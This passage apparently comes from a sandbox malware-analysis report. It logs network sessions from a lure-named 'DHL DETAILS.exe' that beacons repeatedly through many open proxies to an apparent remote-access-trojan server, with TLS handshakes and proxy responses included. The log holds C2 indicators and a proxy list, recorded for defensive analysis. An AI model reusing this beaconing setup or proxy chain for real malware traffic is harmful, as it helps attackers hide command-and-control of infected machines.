1466	192.168.2.5	54189	223.113.80.158	9091	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.209497929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.670073032 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.1 Date: Sat, 09 Mar 2024 12:15:07 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1467	192.168.2.5	54395	133.18.234.13	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.209726095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.495635033 CET	113	IN	HTTP/1.1 503 Service Temporarily Unavailable Content-Type: text/html Connection: close Data Raw: 42 61 63 6b 65 6e 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 Data Ascii: Backend not available

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1468	192.168.2.5	49850	164.92.86.113	62987	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.209917068 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1469	192.168.2.5	54268	38.54.116.9	8118	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.210133076 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.038623095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.333388090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.723838091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.505012989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.334048033 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.146424055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1470	192.168.2.5	54252	43.231.22.228	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.210580111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1471	192.168.2.5	54399	18.133.16.21	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.211503029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.506748915 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:19 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:19.507050037 CET	369	OUT	Data Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 9a 17 77 37 78 46 7a 12 45 3f 6d d6 dd 60 32 28 d2 8e 51 61 5e c9 71 28 a7 a7 55 f7 45 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: lheRw7xFzE?m`2(Qa^q(UE*,+0/$#('=<5/artemis-rat.com#ZlyEc(#HLl.YeM5F6S#4)"1}/JDQ o
Mar 9, 2024 13:14:19.800422907 CET	536	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 4c f3 7f bf a1 c9 7f 62 7d 1b c4 2f fc 97 19 32 b2 c6 aa f1 7a c0 88 ff 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9Lb}/2zDOWNGRD0000H010Uartemis-rat.com0240309112140Z260309112140Z010Uartemis-rat.com0"0H0_9Q
Mar 9, 2024 13:14:19.800535917 CET	536	IN	Data Raw: 0f fa 08 18 4c fe 64 12 dd 31 cc e3 20 6a d4 dd 4e 90 c1 cb 8a a5 af de 21 13 8f 1c f8 7f 94 a4 d2 e9 f0 87 be a3 48 8e 21 6a 74 44 c0 8b b4 a6 47 cf d5 07 dc 22 cc e0 8d ef 2b d8 78 c0 bf a3 6c bf aa c2 47 47 bf 31 78 24 88 1c 40 19 a7 89 6d 22 Data Ascii: Ld1 jN!H!jtDG"+xlGG1x$@m"g2CYZA9Rz(.K`3ty0qGGU#Q.`d&6(;*%rgKy3H4$ho4NwC,(
Mar 9, 2024 13:14:19.800544977 CET	7	IN	Data Raw: 03 00 04 0e 00 00 00 Data Ascii:
Mar 9, 2024 13:14:19.844269037 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 54 d5 b9 01 23 cf a2 50 eb 3b f5 89 19 33 a5 43 dd 4c f7 02 42 d6 67 fe 6f ca b0 44 9f 2c ff 21 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 10 4b 6b 8f 33 24 5c 5d dd 6b 6e 6d 84 00 f0 7c e0 4c d9 ab 31 Data Ascii: %! T#P;3CLBgoD,!(Kk3$\]knm\|L1s3kIA/
Mar 9, 2024 13:14:20.152260065 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 56 48 4d aa cf b2 8a d5 47 5c 15 ef b7 f7 15 99 60 02 39 7f 79 b3 28 42 fb c9 02 40 ae f7 2c 4f 0a e8 1f 75 13 96 12 ba Data Ascii: (VHMG\`9y(B@,Ou

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1472	192.168.2.5	53711	178.62.229.28	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.211719990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1473	192.168.2.5	54382	8.130.34.237	9999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.212888956 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1474	192.168.2.5	54411	119.28.60.64	8090	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.212965965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1475	192.168.2.5	54396	31.220.78.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.212974072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.038377047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.037058115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1476	192.168.2.5	54383	8.219.97.248	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.215370893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.564666033 CET	59	IN	HTTP/1.1 200 Connection Established Proxy-agent: nginx
Mar 9, 2024 13:14:19.565228939 CET	369	OUT	Data Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 9a 31 a1 1e 33 2e 65 c3 a4 12 fa dd 5c 97 23 0c c6 f2 bf 12 78 43 f9 65 ee 86 61 81 90 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: lheR13.e\#xCea*,+0/$#('=<5/artemis-rat.com#ZlyEc(#HLl.YeM5F6S#4)"1}/JDQ o
Mar 9, 2024 13:14:19.772373915 CET	59	IN	HTTP/1.1 200 Connection Established Proxy-agent: nginx
Mar 9, 2024 13:14:19.918936968 CET	115	IN	Data Raw: 16 03 03 00 3b 02 00 00 37 03 03 65 ec 52 9b af 7d 94 30 f2 e2 1c a3 42 e1 5f cf 2e 6e 34 90 b8 77 5f 05 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 0f 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 Data Ascii: ;7eR}0B_.n4w_DOWNGRD/(\gP>,Hn9ZT`WMjm"
Mar 9, 2024 13:14:19.957317114 CET	303	OUT	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 70 f9 7e 9a 15 b8 be 6b b8 30 50 39 34 5a ab 6b e4 4e 4b bf ab ef 15 be fa 65 bb 84 a3 e9 4f b7 17 03 03 00 f7 00 00 00 00 00 00 00 01 52 76 45 54 04 e1 4b e7 23 34 34 99 18 ea 76 89 93 89 Data Ascii: (p~k0P94ZkNKeORvETK#44v~{2`vw\|:f+q^-^vg!~<FGx@{u{JU_EAFynux.)iIMAN@S^$dm5b!P=;D
Mar 9, 2024 13:14:20.124151945 CET	115	IN	Data Raw: 16 03 03 00 3b 02 00 00 37 03 03 65 ec 52 9b af 7d 94 30 f2 e2 1c a3 42 e1 5f cf 2e 6e 34 90 b8 77 5f 05 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 0f 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 Data Ascii: ;7eR}0B_.n4w_DOWNGRD/(\gP>,Hn9ZT`WMjm"
Mar 9, 2024 13:14:21.402072906 CET	1280	IN	Data Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 15 cb ca 72 4b 34 36 db 4b aa 4f f1 85 90 c7 3f 96 e3 3b b0 1d 0c c8 c6 12 28 dd 6c 15 8d bb 39 76 ae ca 83 50 f2 36 f5 ae 07 8e 7a dc e6 ff 89 fd 9d 31 41 19 24 c4 05 9e 57 f2 68 53 db cd 69 d3 9d 93 fb 1a Data Ascii: qrK46KO?;(l9vP6z1A$WhSiKV',\e!u\6HZBEId'd0quQVJ*:3A.K;yS/q>j($zhI?^bS'X%X
Mar 9, 2024 13:14:21.402255058 CET	118	IN	Data Raw: e0 f6 2d ba de 82 af 7e dd fd 8c ce b8 37 99 cd 8b 1e 36 b8 78 c9 04 91 85 52 06 5f 9a ed 50 06 df e7 47 06 b6 4a 1e 28 cb d8 7e b3 26 80 88 03 66 76 ae 74 c9 32 73 b8 0e 76 80 af c6 03 09 5d 30 05 80 bf 2c 69 d7 7f 3f 08 74 07 06 9f 36 da 19 da Data Ascii: -~76xR_PGJ(~&fvt2sv]0,i?t6sx.?ip(2
Mar 9, 2024 13:14:21.405323029 CET	118	IN	Data Raw: e0 f6 2d ba de 82 af 7e dd fd 8c ce b8 37 99 cd 8b 1e 36 b8 78 c9 04 91 85 52 06 5f 9a ed 50 06 df e7 47 06 b6 4a 1e 28 cb d8 7e b3 26 80 88 03 66 76 ae 74 c9 32 73 b8 0e 76 80 af c6 03 09 5d 30 05 80 bf 2c 69 d7 7f 3f 08 74 07 06 9f 36 da 19 da Data Ascii: -~76xR_PGJ(~&fvt2sv]0,i?t6sx.?ip(2
Mar 9, 2024 13:14:21.613241911 CET	1280	IN	Data Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 15 cb ca 72 4b 34 36 db 4b aa 4f f1 85 90 c7 3f 96 e3 3b b0 1d 0c c8 c6 12 28 dd 6c 15 8d bb 39 76 ae ca 83 50 f2 36 f5 ae 07 8e 7a dc e6 ff 89 fd 9d 31 41 19 24 c4 05 9e 57 f2 68 53 db cd 69 d3 9d 93 fb 1a Data Ascii: qrK46KO?;(l9vP6z1A$WhSiKV',\e!u\6HZBEId'd0quQVJ*:3A.K;yS/q>j($zhI?^bS'X%X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1477	192.168.2.5	54348	103.47.93.208	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.219417095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1478	192.168.2.5	53895	74.119.147.209	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.219604969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1479	192.168.2.5	54421	218.252.244.126	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.220166922 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1480	192.168.2.5	54415	47.106.76.196	8088	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.227520943 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.574664116 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1481	192.168.2.5	54420	8.210.80.191	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.231597900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1482	192.168.2.5	54491	200.111.182.6	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.243283987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1483	192.168.2.5	54493	200.111.182.6	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.243880033 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1484	192.168.2.5	54494	200.111.182.6	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.245260000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1485	192.168.2.5	54497	200.111.182.6	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.247127056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1486	192.168.2.5	54422	103.166.141.74	20074	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.291455984 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1487	192.168.2.5	54381	197.242.146.109	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.291932106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.224334002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.630670071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1488	192.168.2.5	54424	185.110.190.99	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.292246103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1489	192.168.2.5	53901	68.169.60.220	8380	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.295104980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1490	192.168.2.5	54373	103.109.59.209	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.296842098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1491	192.168.2.5	54425	139.129.202.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
